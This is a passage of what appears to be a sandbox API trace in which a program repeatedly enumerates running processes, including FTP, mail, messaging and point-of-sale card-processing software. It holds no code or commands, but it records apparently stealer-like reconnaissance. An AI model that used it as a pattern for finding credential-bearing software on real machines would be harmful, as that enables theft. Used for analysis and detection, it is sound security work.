th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0251.850] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0251.852] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0251.855] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0251.858] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0251.860] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0251.862] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0251.864] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0251.867] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0251.870] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0251.939] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0251.942] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0251.951] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0251.954] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0251.956] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0251.958] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0251.961] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0251.963] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0251.965] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0251.969] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0251.971] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0251.974] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0251.979] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0252.013] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0252.016] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0252.020] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0252.023] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0252.026] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0252.030] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0252.033] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0252.036] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0252.051] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0252.055] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0252.058] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0252.066] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0252.070] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0252.073] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0252.077] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0252.079] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0252.082] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0252.087] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0252.089] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0252.092] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0252.094] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0252.098] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0252.101] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0252.107] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0252.110] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0252.112] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0252.115] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0252.118] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0252.121] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0252.124] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0252.128] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0252.130] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0252.133] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0252.135] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0252.137] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0252.140] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0252.343] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0252.345] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.348] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0252.350] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.353] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.354] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0252.356] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.358] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0252.360] CloseHandle (hObject=0x232c) returned 1 [0252.360] Sleep (dwMilliseconds=0x64) [0252.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0252.496] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.500] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.503] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.505] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.506] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.508] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.510] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.511] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.513] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.515] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.517] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.519] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.567] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.569] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.571] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.572] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.574] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.576] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, 